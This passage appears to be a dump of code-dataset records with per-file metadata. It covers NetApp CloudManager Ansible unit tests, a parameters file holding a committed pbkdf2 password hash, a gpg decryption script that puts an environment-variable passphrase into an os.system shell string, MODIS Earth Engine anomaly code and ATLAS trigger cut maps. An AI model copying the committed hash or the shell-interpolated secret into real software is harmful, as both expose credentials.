def test_create_cloudmanager_cvo_azure_ha_pass(self, get_post_api, get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
data = self.set_args_create_cloudmanager_cvo_azure()
data['is_ha'] = True
set_module_args(data)
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_ha_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.delete')
def test_delete_cloudmanager_cvo_azure_pass(self, get_delete_api, get_working_environment_details_by_name,
wait_on_completion, get_token):
set_module_args(self.set_args_delete_cloudmanager_cvo_azure())
get_token.return_value = 'test', 'test'
my_obj = my_module()
my_cvo = {
'name': 'Dummyname',
'publicId': 'test'}
get_working_environment_details_by_name.return_value = my_cvo, None
get_delete_api.return_value = None, None, None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_delete_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_tier_level')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_cvo_tags')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_svm_password')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_property')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
def test_change_cloudmanager_cvo_azure(self, get_cvo, get_property, get_details, update_svm_password, update_cvo_tags,
update_tier_level, get_token):
set_module_args(self.set_default_args_pass_check())
modify = ['svm_password', 'azure_tag', 'tier_level']
my_cvo = {
'name': 'TestA',
'publicId': 'test',
'svm_password': 'password',
'isHA': False,
'azure_tag': [{'tag_key': 'keya', 'tag_value': 'valuea'}, {'tag_key': 'keyb', 'tag_value': 'valueb'}],
}
get_cvo.return_value = my_cvo, None
cvo_property = {'name': 'TestA',
'publicId': 'test',
'ontapClusterProperties': {
'capacityTierInfo': {'tierLevel': 'normal'},
'licensePackageName': 'Professional',
'licenseType': {'capacityLimit': {'size': 2000.0, 'unit': 'TB'},
'name': 'Cloud Volumes ONTAP Capacity Based Charging'},
'ontapVersion': '9.10.0.T1.azure',
'writingSpeedState': 'NORMAL'},
'providerProperties': {
'cloudProviderAccountId': 'CloudProviderAccount-abcdwxyz',
'regionName': 'westus',
'instanceType': 'Standard_DS4_v2',
'resourceGroup': {
'name': 'TestA-rg',
'location': 'westus',
'tags': {
'DeployedByOccm': 'true'
}
},
'vnetCidr': '10.0.0.0/24',
'tags': {
'DeployedByOccm': 'true'
}},
'tenantId': 'Tenant-abCdEfg1',
'workingEnvironmentTyp': 'VSA'
}
get_property.return_value = cvo_property, None
cvo_details = {'cloudProviderName': 'Azure',
'isHA': False,
'name': 'TestA',
'ontapClusterProperties': None,
'publicId': 'test',
'status': None,
'userTags': {'DeployedByOccm': 'true', 'key1': 'value1'},
'workingEnvironmentType': 'VSA'}
get_details.return_value = cvo_details, None
get_token.return_value = 'test', 'test'
my_obj = my_module()
for item in modify:
if item == 'svm_password':
update_svm_password.return_value = True, None
elif item == 'azure_tag':
update_cvo_tags.return_value = True, None
elif item == 'tier_level':
update_tier_level.return_value = True, None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_change_cloudmanager_cvo_azure: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
| 52.762025 | 141 | 0.662204 | 2,291 | 20,841 | 5.6866 | 0.114797 | 0.070464 | 0.093951 | 0.140927 | 0.800123 | 0.786306 | 0.76727 | 0.740789 | 0.721983 | 0.70786 | 0 | 0.007536 | 0.235977 | 20,841 | 394 | 142 | 52.895939 | 0.810651 | 0.039346 | 0 | 0.636086 | 0 | 0 | 0.378106 | 0.282766 | 0 | 0 | 0 | 0 | 0.027523 | 1 | 0.055046 | false | 0.079511 | 0.024465 | 0.009174 | 0.100917 | 0.030581 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
8ef3c31ca841f8e0e497196f8c5b2868c874f8a7 | 92 | py | Python | parameters_443.py | gus-tech/warden | 269ae8ce9513e1f04d2ee21951522f9d9f9b4dd9 | [
"BSD-3-Clause"
] | null | null | null | parameters_443.py | gus-tech/warden | 269ae8ce9513e1f04d2ee21951522f9d9f9b4dd9 | [
"BSD-3-Clause"
] | null | null | null | parameters_443.py | gus-tech/warden | 269ae8ce9513e1f04d2ee21951522f9d9f9b4dd9 | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$9da7bc4479e9347e$647a07974df229cc01ebce39ab3a3fcbe05f70aa"
| 46 | 91 | 0.891304 | 7 | 92 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.450549 | 0.01087 | 92 | 1 | 92 | 92 | 0.450549 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
79977d506417363bc894a358bab1910707daa3bc | 155 | py | Python | scripts/decrypt_json.py | rileymcdanal/rileymcdanal.github.io | 22cfd199f5ad0adfc3ca39a3409bd21e1c38e145 | [
"MIT"
] | null | null | null | scripts/decrypt_json.py | rileymcdanal/rileymcdanal.github.io | 22cfd199f5ad0adfc3ca39a3409bd21e1c38e145 | [
"MIT"
] | 2 | 2021-03-17T01:51:00.000Z | 2021-03-19T21:41:26.000Z | scripts/decrypt_json.py | rileymcdanal/rileymcdanal.github.io | 22cfd199f5ad0adfc3ca39a3409bd21e1c38e145 | [
"MIT"
] | null | null | null | import os
import sys
os.system(f"""gpg --quiet --batch --yes --decrypt --passphrase="{os.environ['DRIVE_SECRET']}" --output token.json token.json.gpg""")
| 31 | 132 | 0.690323 | 23 | 155 | 4.608696 | 0.73913 | 0.169811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090323 | 155 | 4 | 133 | 38.75 | 0.751773 | 0 | 0 | 0 | 0 | 0.333333 | 0.735484 | 0.277419 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
8dac701ea017cd728f7548a47664e48e9785c855 | 17,758 | py | Python | modis/utils/calculations.py | SalsaBoy990/modis-standardize | 9fa15627503c3c5fc5af5ed46a57bbcb746410eb | [
"MIT"
] | 5 | 2020-05-21T17:04:55.000Z | 2021-11-01T10:36:02.000Z | modis/utils/calculations.py | SalsaBoy990/modis-standardize | 9fa15627503c3c5fc5af5ed46a57bbcb746410eb | [
"MIT"
] | null | null | null | modis/utils/calculations.py | SalsaBoy990/modis-standardize | 9fa15627503c3c5fc5af5ed46a57bbcb746410eb | [
"MIT"
] | null | null | null | # Import modules
import ee
from modis.utils.quality_mask import qualityMask, addMask, addMaskedData
from modis.utils.indices import addNDVI, addNDWI, addNDDI
from modis.data.products import Products
# Initializations, instantiations
ee.Initialize()
products = Products()
def calculateMeanStdev(product, bandName, doy, step, start, finish, point, studyArea, resolution, isItNightBoolean):
# for filtering the appropriate image using doy range
doyFilter = ee.Filter.dayOfYear(doy, doy + step)
isItNight = (isItNightBoolean or False)
if product == products.modisRefl:
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product)) \
.map(addNDDI(product)) \
# print(filteredCollection.getInfo())
mean = filteredCollection.select(bandName).mean().clip(studyArea)
stdev = filteredCollection.select(bandName).reduce(ee.Reducer.stdDev()).clip(studyArea)
# !!! This is a critical part!!
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
elif product == products.modisEvi:
storedBandName = str(bandName) + '_1'
# EVI data are 16-day composites, so we need to change the doy filter here
step = 15
doyFilter_16day = ee.Filter.dayOfYear(doy, doy + step)
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter_16day) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product))
# print(ee.Image(filteredCollection.first()).getInfo())
mean = filteredCollection.select(storedBandName).mean().clip(studyArea)
stdev = filteredCollection.select(storedBandName).reduce(ee.Reducer.stdDev()).clip(studyArea)
# !!! This is a critical part!!
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
elif product == products.modisTemp:
storedBandName = str(bandName) + '_1'
# Add Celsius LST band to ImageCollection
def addCelsiusBand(image, bandName):
# Convert data to Celsius, add new band
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.02)) \
.subtract(ee.Image.constant(273.15)) \
.rename('LSTCelsius'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product, storedBandName))
# print(filteredCollection.getInfo())
mean = filteredCollection.select('LSTCelsius').mean().clip(studyArea)
stdev = filteredCollection.select('LSTCelsius').reduce(ee.Reducer.stdDev()).clip(studyArea)
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
elif product == products.modisFpar:
storedBandName = str(bandName) + '_1'
# Apply scale to fAPAR data
def scaleFapar(image, bandName):
# fAPAR data scale factor = 0.01
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.01)) \
.rename('faparPercent'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleFapar(product, storedBandName))
# print(filteredCollection.getInfo())
mean = filteredCollection.select('faparPercent').mean().clip(studyArea)
stdev = filteredCollection.select('faparPercent').reduce(ee.Reducer.stdDev()).clip(studyArea)
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
elif product == products.modisEt:
storedBandName = bandName
if bandName == 'ETPET':
bandName = 'ET'
# Add ET/PET ratio band to ImageCollection
def addEtPetRatioBand(image):
return lambda image: image.addBands(image.select('ET_1')
.divide(image.select('PET_1'))
.rename('etPetRatio'))
# Apply scale to Evapotranspiration data
def scaleET(image):
# fAPAR data scale factor = 0.1
return lambda image: image.addBands(image.select('ET_1') \
.multiply(ee.Image.constant(0.1)) \
.rename('ET_final'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleET(product)) \
.map(addEtPetRatioBand(product))
# print(filteredCollection.getInfo())
if storedBandName == 'ET':
mean = filteredCollection.select('ET_final').mean().clip(studyArea)
stdev = filteredCollection.select('ET_final').reduce(ee.Reducer.stdDev()).clip(studyArea)
elif storedBandName == 'ETPET':
mean = filteredCollection.select('etPetRatio').mean().clip(studyArea)
stdev = filteredCollection.select('etPetRatio').reduce(ee.Reducer.stdDev()).clip(studyArea)
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
elif bandName == 'TVX' or bandName == 'TWX':
# Use appropriate index
index = 'NDVI'
if bandName == 'TVX':
index = 'NDVI'
elif bandName == 'TWX':
index = 'NDWI'
print('valami')
print('Az index: ' + index)
# Add Celsius LST band to ImageCollection
def addCelsiusBand(image):
return lambda image: image.addBands(image.select('LST_Day_1km_1')
.multiply(ee.Image.constant(0.02))
.subtract(ee.Image.constant(273.15))
.rename('LSTCelsius'))
product = 'MODIS/006/MOD11A2'
# filter collection
filteredCollectionLST = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product))
# print(filteredCollectionLST.getInfo())
product = 'MODIS/006/MOD09A1'
# filter collection
filteredCollectionNDI = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product))
# print(filteredCollectionNDI.getInfo())
# Define an inner join
innerJoin = ee.Join.inner()
# Specify an equals filter for image timestamps
# Join NDVI and LST collection images by the start_time field
filterTimeEq = ee.Filter.equals(leftField = 'system:time_start', rightField = 'system:time_start')
# Apply the join
innerJoinedData = innerJoin.apply(filteredCollectionLST, filteredCollectionNDI, filterTimeEq)
# print(innerJoinedData)
# Concatenate images to create an ImageCollection
innerJoinedData = innerJoinedData.map(lambda feature: ee.Image.cat(feature.get('primary'), feature.get('secondary')))
# We need an explicit cast to ImageCollection so that GEE can understand the type to work with
innerJoinedData = ee.ImageCollection(innerJoinedData)
saveBandName = 'LST_' + str(index) + '_ratio'
# Add LST/NDVI ratio band to ImageCollection
def addLstNdiRatioBand(image, index, saveName):
return lambda image: image.addBands(image.select('LSTCelsius')
.divide(image.select(index))
.rename(saveName))
product = 'MODIS/006/MOD11A2'
innerJoinedData = innerJoinedData.map(addLstNdiRatioBand(product, index, saveBandName))
mean = innerJoinedData.select(saveBandName).mean().clip(studyArea)
stdev = innerJoinedData.select(saveBandName).reduce(ee.Reducer.stdDev()).clip(studyArea)
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
else:
print('Error in "calculateMeanStdev" function def')
return -1
def standardizeVariables(product, bandName, year, doy, step, point, mean, stdev, resolution, isItNight):
start = ee.Date(str(year) + '-01-01')
finish = ee.Date(str(year) + '-12-31')
# print(start.getInfo(), finish.getInfo())
isItNight = (isItNight or False)
# for filtering the appropriate image using doy range
doyFilter = ee.Filter.dayOfYear(doy, doy + step)
if product == products.modisRefl:
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product)) \
.map(addNDDI(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select(bandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisEvi:
storedBandName = str(bandName) + '_1'
# EVI data are 16-day composites, so we need to change the doy filter here
step = 15
doyFilter_16day = ee.Filter.dayOfYear(doy, doy + step)
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter_16day) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select(storedBandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisTemp:
storedBandName = str(bandName) + '_1'
# Add Celsius LST band to ImageCollection
def addCelsiusBand(image, bandName):
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.02)) \
.subtract(ee.Image.constant(273.15)) \
.rename('LSTCelsius'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product, storedBandName)) \
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select('LSTCelsius').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisFpar:
storedBandName = str(bandName) + '_1'
# Apply scale to fAPAR data
def scaleFapar(image, bandName):
# fAPAR data scale factor = 0.01
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.01)) \
.rename('faparPercent'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleFapar(product, storedBandName))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select('faparPercent').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisEt:
storedBandName = bandName
if bandName == 'ETPET':
bandName = 'ET'
# Add ET/PET ratio band to ImageCollection
def addEtPetRatioBand(image):
return lambda image: image.addBands(image.select('ET_1')
.divide(image.select('PET_1'))
.rename('etPetRatio'))
# Apply scale to Evapotranspiration data
# ET data scale factor = 0.1
def scaleET(image):
# fAPAR data scale factor = 0.1
return lambda image: image.addBands(image.select('ET_1') \
.multiply(ee.Image.constant(0.1)) \
.rename('ET_final'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleET(product)) \
.map(addEtPetRatioBand(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# print(current.getInfo())
if storedBandName == 'ET':
# standardize dataset
anomaly = current.select('ET_final').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
elif storedBandName == 'ETPET':
# standardize dataset
anomaly = current.select('etPetRatio').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
# print(standardizedResult.getInfo())
return standardizedResult
elif bandName == 'TVX' or bandName == 'TWX':
# Use appropriate index
index = 'NDVI'
if bandName == 'TVX':
index = 'NDVI'
elif bandName == 'TWX':
index = 'NDWI'
# Add Celsius LST band to ImageCollection
def addCelsiusBand(image):
return lambda image: image.addBands(image.select('LST_Day_1km_1')
.multiply(ee.Image.constant(0.02))
.subtract(ee.Image.constant(273.15))
.rename('LSTCelsius'))
product = 'MODIS/006/MOD11A2'
# filter collection
filteredCollectionLST = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product))
# print(filteredCollectionLST.getInfo())
product = 'MODIS/006/MOD09A1'
# filter collection
filteredCollectionNDI = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product))
# print(filteredCollectionNDI.getInfo())
# Define an inner join
innerJoin = ee.Join.inner()
# Specify an equals filter for image timestamps
# Join NDVI and LST collection images by the start_time field
filterTimeEq = ee.Filter.equals(leftField = 'system:time_start', rightField = 'system:time_start')
# Apply the join
innerJoinedData = innerJoin.apply(filteredCollectionLST, filteredCollectionNDI, filterTimeEq)
# print(innerJoinedData)
# Concatenate images to create an ImageCollection
innerJoinedData = innerJoinedData.map(lambda feature: ee.Image.cat(feature.get('primary'), feature.get('secondary')))
# We need an explicit cast to ImageCollection so that GEE can understand the type to work with
innerJoinedData = ee.ImageCollection(innerJoinedData)
# print(innerJoinedData.getInfo())
saveBandName = 'LST_' + str(index) + '_ratio'
# Add LST/NDVI ratio band to ImageCollection
def addLstNdiRatioBand(image, index, saveName):
return lambda image: image.addBands(image.select('LSTCelsius')
.divide(image.select(index))
.rename(saveName))
product = 'MODIS/006/MOD11A2'
innerJoinedData = innerJoinedData.map(addLstNdiRatioBand(product, index, saveBandName))
current = innerJoinedData.first()
# standardize dataset
anomaly = current.select(saveBandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
| 34.481553 | 121 | 0.669332 | 1,802 | 17,758 | 6.571032 | 0.109323 | 0.01689 | 0.028376 | 0.042564 | 0.894012 | 0.886158 | 0.853982 | 0.851448 | 0.837091 | 0.837091 | 0 | 0.009402 | 0.215396 | 17,758 | 514 | 122 | 34.548638 | 0.840451 | 0.204302 | 0 | 0.857143 | 0 | 0 | 0.05432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.013289 | 0.039867 | 0.142857 | 0.009967 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8dafeddb95dd9732a031d747f6c261911001a39c | 20,055 | py | Python | kepler/emulator/hypos/TrigEgammaFastCaloHypoCuts.py | micaelverissimo/kepler | 5db55aa39d7e65f460f533dfd91ca6e5fdb3076a | [
"MIT"
] | 1 | 2021-11-20T22:45:13.000Z | 2021-11-20T22:45:13.000Z | kepler/emulator/hypos/TrigEgammaFastCaloHypoCuts.py | micaelverissimo/kepler | 5db55aa39d7e65f460f533dfd91ca6e5fdb3076a | [
"MIT"
] | null | null | null | kepler/emulator/hypos/TrigEgammaFastCaloHypoCuts.py | micaelverissimo/kepler | 5db55aa39d7e65f460f533dfd91ca6e5fdb3076a | [
"MIT"
] | 3 | 2021-09-10T18:11:21.000Z | 2022-03-17T15:36:29.000Z | __all__ = ['L2CaloCutMaps', 'L2CaloPhotonCutMaps']
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
# L2 Calo cut definitions for Electrons
# Ryan Mackenzie White <ryan.white@cern.ch>
# Akshay Katre
# Cuts migrated from L2CaloHypoConfig
class L2CaloCutMaps(object):
# The following triggers were optimized in 2012 by YanPing
# e12_loose1
# e12_loose0
# loose triggers above 22 GeV use e12_loose1 cut defs
# e24_medium1 -- Higher threshold triggers use same cuts
# tight/tight1 uses e24_medium1 cuts
# New EF ID tunes will start with Run1 loose1,medium1,tight1 cuts
# Cut maps are grouped by Et threshold
# Adding vloose working points, same cuts as loose
def __init__(self, threshold):
##########################
# Et 5 GeV
##########################
# e5_loose1
##########################
# self.HADETthr = [0.1738, 0.1696, 0.1318, 0.1738, 0.0548875, 0.1486, 0.1696, 0.1738, 0.157]
# self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
# self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, -9999., 0.722, 0.684, 0.722, -9999.]
##########################
# e5_medium1
#self.HADETthr = [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147]
#self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.70]
#self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
# e5_tight1
# self.HADETthr = [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147]
# self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.70]
# self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
##########################
if(float(threshold) < 12):
self.MapsHADETthr = {
'vloose': [0.2337, 0.20976, 0.1392, 0.1872, 0.1315, 0.3234, 0.384, 0.1901, 0.1901],
'loose': [0.2337, 0.2097, 0.1392, 0.1872, 0.1255, 0.3234, 0.3840, 0.1901, 0.1901],
'lhvloose': [0.2337, 0.20976, 0.1392, 0.1872, 0.1315, 0.3234, 0.384, 0.1901, 0.1901],
'lhloose': [0.2337, 0.2097, 0.1392, 0.1872, 0.1255, 0.3234, 0.3840, 0.1901, 0.1901],
'medium': [0.1872, 0.1824, 0.1392, 0.1872, 0.08196 ,0.2497, 0.384, 0.19008, 0.19008],
'lhmedium': [0.1872, 0.1824, 0.1392, 0.1872, 0.08196 ,0.2497, 0.384, 0.19008, 0.19008],
'tight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
'lhtight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
'mergedtight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
}
self.MapsCAERATIOthr = {
'vloose': [0.48, 0.448, 0.1295, 0.0137, -9999. ,0.0122, 0.512, 0.6073, -9999],
'loose': [0.48, 0.448, 0.1295, 0.0137, -9999., 0.0122, 0.512, 0.6073, -9999],
'lhvloose': [0.48, 0.448, 0.1295, 0.0137, -9999. ,0.0122, 0.512, 0.6073, -9999],
'lhloose': [0.48, 0.448, 0.1295, 0.0137, -9999., 0.0122, 0.512, 0.6073, -9999],
'medium': [0.48, 0.448, 0.288, 0.192, -9999., 0.0176, 0.512, 0.608, -9999.],
'lhmedium': [0.48, 0.448, 0.288, 0.192, -9999., 0.0176, 0.512, 0.608, -9999.],
'tight': [0.48, 0.448, 0.288, 0.192, -9999., 0.256, 0.512, 0.608, -9999.],
'lhtight': [0.48, 0.448, 0.288, 0.192, -9999., 0.256, 0.512, 0.608, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCARCOREthr = {
'vloose': [0.448, 0.48, 0.5414, 0.576, 0.352, 0.608, 0.576, 0.608, 0.55],
'loose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.7094, 0.7012, 0.6977, 0.6960],
'lhvloose': [0.448, 0.48, 0.5414, 0.576, 0.352, 0.608, 0.576, 0.608, 0.55],
'lhloose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.7094, 0.7012, 0.6977, 0.6960],
'medium': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'lhmedium': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'tight': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'lhtight': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
##########################
# Et 12 GeV
##########################
# e12_loose1
#AT 30-March-2012 Optimisation by Yanping:
#self.HADETthr = [0.04225, 0.04075, 0.04575, 0.03575, 0.05275, 0.05325, 0.05525, 0.05325, 0.04675]
#self.CARCOREthr = [0.8275, 0.8225, 0.7975, 0.8275, -9999., 0.8075, 0.8475, 0.8475, -9999.]
#self.CAERATIOthr = [0.775269, 0.735433, 0.574831, 0.513675, -9999., 0.584799, 0.776095, 0.822032, -9999.]
#AT: this optimisation could be well propagated to all loose1 triggers with ET>12 GeV if we need to cut L2 rate further
# e12_medium1
#self.HADETthr = [0.04225, 0.04075, 0.04575, 0.03575, 0.05275, 0.05325, 0.05525, 0.05325, 0.04675]
#self.CARCOREthr = [0.8275, 0.8225, 0.7975, 0.8275, -9999., 0.8075, 0.8475, 0.8475, -9999.]
